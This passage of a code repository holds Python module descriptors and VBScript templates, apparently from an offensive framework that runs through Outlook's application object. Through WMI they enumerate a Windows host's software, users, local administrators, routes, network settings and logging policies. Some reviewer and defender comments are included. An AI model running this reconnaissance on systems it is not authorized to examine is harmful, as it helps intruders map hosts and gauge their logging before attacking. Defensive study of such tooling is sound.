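        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Every backslash is now escaped. The registry paths already were;
        # "root\cimv2" relied on the invalid escape "\c" (SyntaxWarning on
        # Python 3.12+). The resulting text is unchanged.
        self.help = """
Enumerates the installed applications.
It enumerates information from the
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\
&
HKLM\\SOFTWARE\\wow6432node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\
registry keys.
It uses WbemScripting.SWbemLocator
- Add
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumKey
- ConnectServer(root\\cimv2).GetStringValue
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_installedapps'
        self.depends = []
        super().__init__(templatepath)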
================================================
FILE: functions/enumerate/host/list_installedapps.txt
================================================
' Lists "DisplayName | DisplayVersion" for the subkeys of the HKLM Uninstall
' key, in two passes labelled 64-bit and 32-bit.
Function list_installedapps()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    ' NOTE(review): SWbemLocator documents only ConnectServer; Add is a method
    ' of SWbemNamedValueSet. With errors suppressed this call presumably fails
    ' silently, in which case both passes read the same registry view and the
    ' 64/32-bit labels below are not reliable - verify.
    objLocator.Add "__ProviderArchitecture", 64
    Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    KeyPathApps = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
    ' 2147483650 = &H80000002 = HKEY_LOCAL_MACHINE
    objReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps
    apps = "Installed 64bits Applications:" & vbCrLf
    For Each strSubkeyapps In arrSubkeysapps
        objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayName", appName
        ' Subkeys whose DisplayName comes back empty are skipped.
        If appName <> "" Then
            objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayVersion", Version
            apps = apps & appName & " | " & Version & vbCrLf
        End If
    Next
    apps = apps & vbCrLf & vbCrLf
    ' Second pass: same key path, intended for the 32-bit view (see note above).
    objLocator.Add "__ProviderArchitecture", 32
    Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    KeyPathApps = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
    objReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps
    apps = apps & "Installed 32bits Applications:" & vbCrLf
    For Each strSubkeyapps In arrSubkeysapps
        objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayName", appName
        If appName <> "" Then
            objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayVersion", Version
            apps = apps & appName & " | " & Version & vbCrLf
        End If
    Next
    list_installedapps = apps & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_installeddotnet.py
================================================
from lib.core.specmodule import SpecModule
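class Spec(SpecModule):
    """Module descriptor for ``list_installeddotnet``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates the installed .NET versions.
Based on MS documentation:
https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed
Lists the installed versions
It uses WbemScripting.SWbemNamedValueSet
- Add
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumValues
- ConnectServer(root\\cimv2).GetDwordValue
- ConnectServer(root\\cimv2).GetStringValue
- ConnectServer(root\\cimv2).GetExpandedStringValue
- ConnectServer(root\\cimv2).GetBinaryValue
- ConnectServer(root\\cimv2).GetMultiStringValue
- ConnectServer(root\\cimv2).GetQWORDValue
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_installeddotnet'
        # Helper template that provides GetRegValue, which the entry function calls.
        self.depends = ['./helperFunctions/Getregvalue.txt']
        super().__init__(templatepath)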
================================================
FILE: functions/enumerate/host/list_installeddotnet.txt
================================================
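' Reports which .NET Framework versions are installed by probing one registry
' value per version under HKLM, for both the native and WOW6432Node locations.
' GetRegValue comes from the helper template listed in the module's depends;
' its return format is not visible here. The checks below treat a result that
' starts with "Path:" as "value present".
Function list_installeddotnet()
    ' Errors are suppressed for the whole function.
    On error resume next
    list_installeddotnet = "INSTALLED .NET VERSIONS:" & vbCrLf
    ' 2147483650 = &H80000002 = HKEY_LOCAL_MACHINE
    x64v1 = GetRegValue("HKLM", "Software\Microsoft\.NETFramework\Policy\v1.0\3705", "Install", 64, 2147483650, "STDREGPROV")
    x64v11 = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v1.1.4322", "Install", 64, 2147483650, "STDREGPROV")
    ' The 2.0 key is NDP\v2.0.50727; "v2.3.50727" does not exist, so 2.0 could
    ' never be reported.
    x64v2 = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v2.0.50727", "Install", 64, 2147483650, "STDREGPROV")
    x64v3 = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v3.0\Setup", "InstallSuccess", 64, 2147483650, "STDREGPROV")
    x64v35 = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v3.5", "Install", 64, 2147483650, "STDREGPROV")
    x64v40C = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v4\Client", "Install", 64, 2147483650, "STDREGPROV")
    x64v40F = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v4\Full", "Install", 64, 2147483650, "STDREGPROV")
    ' The 32-bit entries are reached through the WOW6432Node path while still
    ' passing 64 as the fourth argument.
    x86v1 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\.NETFramework\Policy\v1.0\3705", "Install", 64, 2147483650, "STDREGPROV")
    x86v11 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v1.1.4322", "Install", 64, 2147483650, "STDREGPROV")
    x86v2 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v2.0.50727", "Install", 64, 2147483650, "STDREGPROV")
    x86v3 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v3.0\Setup", "InstallSuccess", 64, 2147483650, "STDREGPROV")
    x86v35 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v3.5", "Install", 64, 2147483650, "STDREGPROV")
    x86v40C = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v4\Client", "Install", 64, 2147483650, "STDREGPROV")
    x86v40F = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v4\Full", "Install", 64, 2147483650, "STDREGPROV")
    ' InStr(1, s, "Path:", 1) = 1 is a case-insensitive "starts with" test.
    if (inStr(1,x64v1,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X64 .NET Framework v1.0 installed" & vbCrLf
    end if
    if (inStr(1,x64v11,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X64 .NET Framework v1.1 installed" & vbCrLf
    end if
    if (inStr(1,x64v2,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X64 .NET Framework v2.0 installed" & vbCrLf
    end if
    if (inStr(1,x64v3,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X64 .NET Framework v3.0 installed" & vbCrLf
    end if
    if (inStr(1,x64v35,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X64 .NET Framework v3.5 installed" & vbCrLf
    end if
    if (inStr(1,x64v40C,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X64 .NET Framework v4.0-Client installed" & vbCrLf
    end if
    if (inStr(1,x64v40F,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X64 .NET Framework v4.0-Full installed" & vbCrLf
    end if
    if (inStr(1,x86v1,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X86 .NET Framework v1.0 installed" & vbCrLf
    end if
    if (inStr(1,x86v11,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X86 .NET Framework v1.1 installed" & vbCrLf
    end if
    if (inStr(1,x86v2,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X86 .NET Framework v2.0 installed" & vbCrLf
    end if
    if (inStr(1,x86v3,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X86 .NET Framework v3.0 installed" & vbCrLf
    end if
    if (inStr(1,x86v35,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X86 .NET Framework v3.5 installed" & vbCrLf
    end if
    if (inStr(1,x86v40C,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X86 .NET Framework v4.0-Client installed" & vbCrLf
    end if
    if (inStr(1,x86v40F,"Path:",1) = 1) then
        list_installeddotnet = list_installeddotnet & "X86 .NET Framework v4.0-Full installed" & vbCrLf
    end if
End Function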
================================================
FILE: functions/enumerate/host/list_installedpowershell.py
================================================
from lib.core.specmodule import SpecModule
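class Spec(SpecModule):
    """Module descriptor for ``list_installedpowershell``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates the current installed PowerShell versions on the host using registry.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumKey
- ConnectServer(root\\cimv2).GetStringValue
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_installedpowershell'
        self.depends = []
        super().__init__(templatepath)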
================================================
FILE: functions/enumerate/host/list_installedpowershell.txt
================================================
' Reports one PowerShell engine version read from the registry: the value
' under ...\PowerShell\3\PowerShellEngine if present, otherwise the one under
' ...\PowerShell\1\PowerShellEngine, otherwise the word "nothing".
Function list_installedpowershell()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    keyps3 = "SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine"
    keyps1 = "SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine"
    ' poshkey is assigned but not used anywhere in this function.
    poshkey = "SOFTWARE\Microsoft\PowerShell"
    ' 2147483650 = &H80000002 = HKEY_LOCAL_MACHINE. The EnumKey results
    ' (arrSubKeys) are not read afterwards.
    objReg.EnumKey 2147483650, keyps1, arrSubKeys
    objReg.GetStringValue 2147483650, keyps1, "PowerShellVersion", ver2
    objReg.EnumKey 2147483650, keyps3, arrSubKeys
    objReg.GetStringValue 2147483650, keyps3, "PowerShellVersion", ver3
    ' Prefer the "3" engine key; fall back to the "1" engine key.
    If IsNull(ver3) Then
        If IsNull(ver2) Then
            val = "nothing"
        Else
            val = ver2
        End If
    Else
        val = ver3
    End If
    list_installedpowershell = "PowerShell Version: " & val & vbCrlf & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_iprouting.py
================================================
from lib.core.specmodule import SpecModule
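class Spec(SpecModule):
    """Module descriptor for ``list_iprouting``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates the IP Routing table using the Win32_IP4RouteTable and the Win32_IP4PersistedRouteTable classes.
(Only a few selected attributes is dumped)
Official documentation:
- https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4routetable
- https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4persistedroutetable
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: SELECT * FROM Win32_IP4RouteTable
- Query: SELECT * FROM Win32_IP4PersistedRouteTable
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_iprouting'
        self.depends = []
        super().__init__(templatepath)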
================================================
FILE: functions/enumerate/host/list_iprouting.txt
================================================
' Dumps selected fields of the active and persisted IPv4 route tables
' (Win32_IP4RouteTable and Win32_IP4PersistedRouteTable) as text.
Function list_iprouting()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    ' The namespace is written with a leading backslash here, unlike the
    ' "root\cimv2" form used by sibling templates in this listing.
    Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2")
    ' 48 = wbemFlagReturnImmediately (16) + wbemFlagForwardOnly (32)
    Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_IP4RouteTable",,48)
    list_iprouting = "----- DYNAMIC ROUTES -----" & vbCrlf
    For Each objItem in colItems
        list_iprouting = list_iprouting & "Description: " & objItem.Description & vbCrlf
        list_iprouting = list_iprouting & "Interface Index: " & objItem.InterfaceIndex & vbCrlf
        list_iprouting = list_iprouting & "Metric: " & objItem.Metric1 & vbCrlf
        list_iprouting = list_iprouting & "Protocol: " & objItem.Protocol & vbCrlf & vbCrlf
    Next
    list_iprouting = list_iprouting & "----- PERSISTENT ROUTES -----" & vbCrlf
    Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_IP4PersistedRouteTable",,48)
    ' Only Description and Metric1 are emitted for persisted routes, and no
    ' blank line separates the entries.
    For Each objItem in colItems2
        list_iprouting = list_iprouting & "Description: " & objItem.Description & vbCrlf
        list_iprouting = list_iprouting & "Metric: " & objItem.Metric1 & vbCrlf
    Next
End Function
================================================
FILE: functions/enumerate/host/list_localadmins.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
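class Spec(SpecModule):
    """Module descriptor for ``list_localadmins``: help text, entry point, options."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata and its ``host`` option, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Two corrections to the help text: the option is registered below as
        # "host" (the text said "inMachine"), and the namespace backslash is
        # escaped because "\c" is an invalid escape sequence (SyntaxWarning on
        # Python 3.12+).
        self.help = """
Enumerates the local administrators on the host specified with the host option
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: Select * from Win32_ComputerSystem
- Query: SELECT * FROM Win32_GroupUser WHERE GroupComponent=Win32_Group.Domain=VARIABLE,Name='Administrators'
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_localadmins'
        self.depends = []
        # The value fills the {{host}} placeholder of the companion template,
        # i.e. it becomes script source text.
        # NOTE(review): presumably quotedstring wraps the value in quotes and
        # neutralises embedded ones; verify, since the handler is not shown here.
        self.options['host'] = {
            "value": ".",
            "required": True,
            "description": "The machine you want to list local admins from. It defaults to localhost using .",
            "handler": quotedstring
        }
        super().__init__(templatepath)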
================================================
FILE: functions/enumerate/host/list_localadmins.txt
================================================
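' Lists the members of the Administrators group on the machine given by the
' {{host}} template placeholder. Members whose domain differs from the
' machine name are shown as DOMAIN\name, local accounts as the bare name.
' There is no "On Error Resume Next" here, so a failed connection raises.
Function list_localadmins()
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objLocator.ConnectServer({{host}}, "root\cimv2")
    ' The machine name reported by WMI is used both in the header and to
    ' build the Win32_Group reference in the second query.
    Set colItems1 = objWMIService.ExecQuery( "Select * from Win32_ComputerSystem")
    For each objItem in colItems1
        MachineName = objItem.Name
    Next
    toreturn = toreturn & "Administrators Group Membership on Machine : " & MachineName & vbCrLf
    toreturn = toreturn & "-----Group Members------" & vbCrLf
    Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_GroupUser WHERE GroupComponent=""Win32_Group.Domain='" & MachineName & "',Name='Administrators'""")
    For Each Path In colItems2
        ' PartComponent is split on "," into a Domain="..." part and a
        ' Name="..." part; Chr(34) is the double quote stripped from both.
        NamesArray = Split(Path.PartComponent,",")
        strMemberName = Replace(Replace(NamesArray(1),Chr(34),""),"Name=","")
        DomainNameArray = Split(NamesArray(0),"=")
        strDomainName = Replace(DomainNameArray(1),Chr(34),"")
        ' Compare with MachineName. The original compared with strComputerName,
        ' which is never assigned, so every member received a domain prefix.
        ' 1 = vbTextCompare (case-insensitive).
        If StrComp(strDomainName, MachineName, 1) <> 0 Then
            strMemberName = strDomainName & "\" & strMemberName
        End If
        toreturn = toreturn & strMemberName & vbCrLf
    Next
    list_localadmins = toreturn & vbCrLf
End Function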
================================================
FILE: functions/enumerate/host/list_localusers.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
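class Spec(SpecModule):
    """Module descriptor for ``list_localusers``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates the local users on the current host
It uses CreateObject("Wscript.Shell")
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: "SELECT * FROM Win32_UserAccount WHERE LocalAccount = True"
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_localusers'
        self.depends = []
        super().__init__(templatepath)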
================================================
FILE: functions/enumerate/host/list_localusers.txt
================================================
' Lists the local user accounts (Win32_UserAccount WHERE LocalAccount = True)
' with a fixed set of account attributes for each.
Function list_localusers()
    ' Errors are suppressed for the whole function.
    on error resume next
    ' The computer name is taken from the %COMPUTERNAME% environment variable
    ' and is used only in the header line.
    Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell")
    compname = sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
    toreturn = toreturn & "Local users on Machine " & compname & " : " & vbCrLf
    Set colUsers = objWMIService.ExecQuery("SELECT * FROM Win32_UserAccount WHERE LocalAccount = True")
    For Each objUser in colUsers
        ' One block per account: the name, then "--Field: value" lines.
        toreturn = toreturn & objUser.Name & vbCrLf
        toreturn = toreturn & "--Description: " & objUser.Description & vbCrLf
        toreturn = toreturn & "--Disabled: " & objUser.Disabled & vbCrLf
        toreturn = toreturn & "--FullName: " & objUser.FullName & vbCrLf
        toreturn = toreturn & "--Lockout: " & objUser.Lockout & vbCrLf
        toreturn = toreturn & "--PasswordChangeable: " & objUser.PasswordChangeable & vbCrLf
        toreturn = toreturn & "--PasswordExpires: " & objUser.PasswordExpires & vbCrLf
        toreturn = toreturn & "--PasswordRequired: " & objUser.PasswordRequired & vbCrLf
        toreturn = toreturn & vbCrLf
    Next
    list_localusers = toreturn
End Function
================================================
FILE: functions/enumerate/host/list_logging.py
================================================
from lib.core.specmodule import SpecModule
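class Spec(SpecModule):
    """Module descriptor for ``list_logging``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates status of logging on the host.
It figures out status on logging settings for:
- ProcessCreationIncludeCmdLine
- PowerShell Script Block Logging
- PowerShell Transcript Logging
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumKey
- ConnectServer(root\\cimv2).GetDWORDValue
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_logging'
        self.depends = []
        super().__init__(templatepath)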
================================================
FILE: functions/enumerate/host/list_logging.txt
================================================
' Reports whether three logging policies are enabled, judged only from their
' policy values under HKLM: command-line process auditing, PowerShell script
' block logging and PowerShell transcription.
' Defender note: every read goes through StdRegProv on an object created by
' Outlook's application object, so reads of these policy keys from that
' context are themselves worth reviewing in telemetry.
Function list_logging()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
    ' Cmd Line Process Auditing
    keycmdlog = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
    ' 2147483650 = &H80000002 = HKEY_LOCAL_MACHINE. The EnumKey results are
    ' not read afterwards.
    objReg.EnumKey 2147483650, keycmdlog, arrSubKeys
    objReg.GetDWORDValue 2147483650, keycmdlog, "ProcessCreationIncludeCmdLine_Enabled", isenabled
    ' A missing value (Null) and a value of 0 are both reported as "Not Enabled".
    If IsNull(isenabled) Then
        val = "Not Enabled"
    Else
        If isenabled > 0 Then
            val = "Enabled!"
        Else
            val = "Not Enabled"
        End If
    End If
    cmdaud = "Command Line Proc Arg Auditing: " & val & vbCrlf
    'Posh logging
    pslog = ""
    KeyPSLog1 = "Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
    KeyPSLog2 = "Software\Policies\Microsoft\Windows\PowerShell\Transcription"
    objReg.EnumKey 2147483650, KeyPSLog1, arrSubkeys
    objReg.GetDWORDValue 2147483650, KeyPSLog1, "EnableScriptBlockLogging", scriptlogging
    ' Only the exact value 1 counts as enabled; anything else is "Disabled".
    If scriptlogging = 1 Then
        pslog = pslog & "PowerShell Script Block Logging: Enabled" & vbCrlf
    Else
        pslog = pslog & "PowerShell Script Block Logging: Disabled" & vbCrlf
    End If
    objReg.EnumKey 2147483650, KeyPSLog2, arrSubkeys
    objReg.GetDWORDValue 2147483650, KeyPSLog2, "EnableTranscripting", enabletranscripting
    ' NOTE(review): OutputDirectory is read as a DWORD and compared with 1
    ' below. As far as I know this policy value holds a directory path, so
    ' the "Output Directory" line presumably always reads Disabled - confirm.
    objReg.GetDWORDValue 2147483650, KeyPSLog2, "OutputDirectory", outputdirectory
    objReg.GetDWORDValue 2147483650, KeyPSLog2, "EnableInvocationHeader", enableinvocationheader
    If enabletranscripting = 1 Then
        pslog = pslog & "PowerShell Transcription Logging: Enabled" & vbCrlf
    Else
        pslog = pslog & "PowerShell Transcription Logging: Disabled" & vbCrlf
    End If
    If outputdirectory = 1 Then
        pslog = pslog & "PowerShell Output Directory: Enabled" & vbCrlf
    Else
        pslog = pslog & "PowerShell Output Directory: Disabled" & vbCrlf
    End If
    If enableinvocationheader = 1 Then
        pslog = pslog & "PowerShell Invocation Header: Enabled" & vbCrlf
    Else
        pslog = pslog & "PowerShell Invocation Header: Disabled" & vbCrlf
    End If
    list_logging = cmdaud & vbCrLF & pslog & vbCrLF
End Function
================================================
FILE: functions/enumerate/host/list_mappeddrives.py
================================================
from lib.core.specmodule import SpecModule
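class Spec(SpecModule):
    """Module descriptor for ``list_mappeddrives``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates the mapped drives on the host.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: Select Name,ProviderName from Win32_MappedLogicalDisk
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_mappeddrives'
        self.depends = []
        super().__init__(templatepath)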
================================================
FILE: functions/enumerate/host/list_mappeddrives.txt
================================================
' Lists mapped network drives as "Letter - Provider" lines, using the Name
' and ProviderName properties of Win32_MappedLogicalDisk.
Function list_mappeddrives()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
    Set col = objWMIService.ExecQuery ("Select Name,ProviderName from Win32_MappedLogicalDisk")
    ' Header row; one line per mapped drive follows.
    drives = "Letter - Provider" & vbCrLf
    For Each obj in col
        drives = drives & obj.Name & " - " & obj.ProviderName & vbCrLf
    Next
    list_mappeddrives = drives
End Function
================================================
FILE: functions/enumerate/host/list_networkcardinfo.py
================================================
from lib.core.specmodule import SpecModule
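class Spec(SpecModule):
    """Module descriptor for ``list_networkcardinfo``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates all the information from the network cards.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: SELECT * FROM Win32_NetworkAdapterConfiguration
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_networkcardinfo'
        self.depends = []
        super().__init__(templatepath)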
================================================
FILE: functions/enumerate/host/list_networkcardinfo.txt
================================================
' Dumps every non-empty property of every Win32_NetworkAdapterConfiguration
' instance as "Name: value" lines.
Function list_networkcardinfo()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    ' The namespace is written with a leading backslash here, unlike the
    ' "root\cimv2" form used by most sibling templates in this listing.
    Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2")
    ' 48 = wbemFlagReturnImmediately (16) + wbemFlagForwardOnly (32)
    Set colNicConfigs = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration",,48)
    For Each NIC in colNicConfigs
        For Each nicAttribute in NIC.Properties_
            ' Properties whose value is Null or Empty are left out.
            if Not (IsNull(nicAttribute.value) OR IsEmpty(nicAttribute.value)) Then
                ' NOTE(review): IsArray and Join receive the property object,
                ' not nicAttribute.value; whether array-valued properties
                ' (address lists, for example) are joined as intended depends
                ' on default-property resolution - verify.
                if IsArray(nicAttribute) then
                    nicResponse = nicResponse & nicAttribute.Name & ": " & Join(nicAttribute, ", ") & vbCrLf
                else
                    nicResponse = nicResponse & nicAttribute.Name & ": " & nicAttribute.value & vbCrLf
                end if
            end if
        Next
    Next
    list_networkcardinfo = nicResponse
End Function
================================================
FILE: functions/enumerate/host/list_networklogon.py
================================================
from lib.core.specmodule import SpecModule
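class Spec(SpecModule):
    """Module descriptor for ``list_networklogon``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
        """Set the module metadata, then delegate to ``SpecModule.__init__``.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Stored on the instance as ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The namespace backslash is written as "\\": "\c" is not a valid
        # escape sequence and raises a SyntaxWarning on Python 3.12+. The
        # resulting text is unchanged.
        self.help = """
Enumerates all the information from the Network login profile.
Contains interesting information such as logon restrictions, logon scripts, number of logons and password age
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: SELECT * FROM Win32_NetworkLoginProfile
"""
        # Name of the function defined in the companion .txt template.
        self.entry = 'list_networklogon'
        self.depends = []
        super().__init__(templatepath)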
================================================
FILE: functions/enumerate/host/list_networklogon.txt
================================================
' Dumps every non-empty property of every Win32_NetworkLoginProfile instance
' as "Name: value" lines.
Function list_networklogon()
    ' Errors are suppressed for the whole function.
    On error resume next
    Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
    ' The namespace is written with a leading backslash here, unlike the
    ' "root\cimv2" form used by most sibling templates in this listing.
    Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2")
    ' 48 = wbemFlagReturnImmediately (16) + wbemFlagForwardOnly (32)
    Set colNetLogProfs = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkLoginProfile",,48)
    ' The loop variable is named NIC but holds a login profile object.
    For Each NIC in colNetLogProfs
        For Each netlogAttribute in NIC.Properties_
            ' Properties whose value is Null or Empty are left out.
            if Not (IsNull(netlogAttribute.value) OR IsEmpty(netlogAttribute.value)) Then
                ' NOTE(review): IsArray and Join receive the property object,
                ' not netlogAttribute.value; whether array-valued properties
                ' are joined as intended depends on default-property
                ' resolution - verify.
                if IsArray(netlogAttribute) then
